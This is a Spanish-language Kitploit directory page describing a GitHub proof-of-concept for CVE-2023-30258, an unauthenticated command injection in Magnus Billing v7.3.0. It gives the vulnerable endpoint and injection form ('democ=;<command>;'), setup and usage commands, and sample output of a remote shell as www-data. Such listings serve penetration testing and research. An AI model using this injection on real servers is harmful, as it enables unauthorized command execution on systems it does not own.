Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2023-30258-Magnus-Billing-v7-Command-Injection-PoC — Vulnerabilidad de inyección de comandos no autenticada en Magnus Billing v7.3.0. | Kitploit
Herramientas/GitHubGitHub/estebanzarate/cve-2023-30258-magnus-billing-v7-command-injection-poc
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y Control
GitHubestebanzarate/cve-2023-30258-magnus-billing-v7-command-injection-poc

CVE-2023-30258-Magnus-Billing-v7-Command-Injection-PoC

Vulnerabilidad de inyección de comandos no autenticada en Magnus Billing v7.3.0.

Ver Repositorio
11hace 6 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2023-30258 — Magnus Billing v7 Inyección de Comandos (PoC)

Vulnerabilidad de inyección de comandos no autenticados en Magnus Billing v7.3.0. El parámetro GET democ en icepay.php se pasa directamente a una función de shell sin sanitización, permitiendo la ejecución arbitraria de comandos como el usuario del servidor web. La inyección es ciega — la salida no se refleja en la respuesta HTTP — por lo que este exploit redirige la salida de cada comando a un archivo en la raíz web y lo recupera a través de HTTP.


Cómo funciona

  1. Envía una solicitud GET a /mbilling/lib/icepay/icepay.php?democ=;<command>;.
  2. Redirige la salida del comando a un archivo dentro de la raíz web (out.txt).
  3. Obtiene el archivo de salida a través de HTTP e imprime el resultado.
  4. Limpia el archivo de salida al salir.

Si el objetivo utiliza una ruta de raíz web diferente, ajusta OUTPUT_FILE al inicio del script.

Requisitos

  • Python 3
  • Instalar dependencias:
root@kitploit:~
python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests prompt_toolkit

Uso

root@kitploit:~
python3 exploit.py -t http://TARGET

Ejemplo:

root@kitploit:~
$ python3 exploit.py -t http://10.10.10.10
[*] Testing command execution...
[+] Target is vulnerable! Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)
[+] Shell opened. Type 'exit' or Ctrl+C to quit.

Shell> whoami
www-data

Referencias

  • CVE-2023-30258
  • EDB-52170
  • PoC original de Tinashe Matanda

Créditos

  • Descubrimiento y exploit original: Tinashe Matanda (SadNinja) / CodeSecLab
  • Limpieza y shell interactiva: Esteban Zárate
Descargar herramienta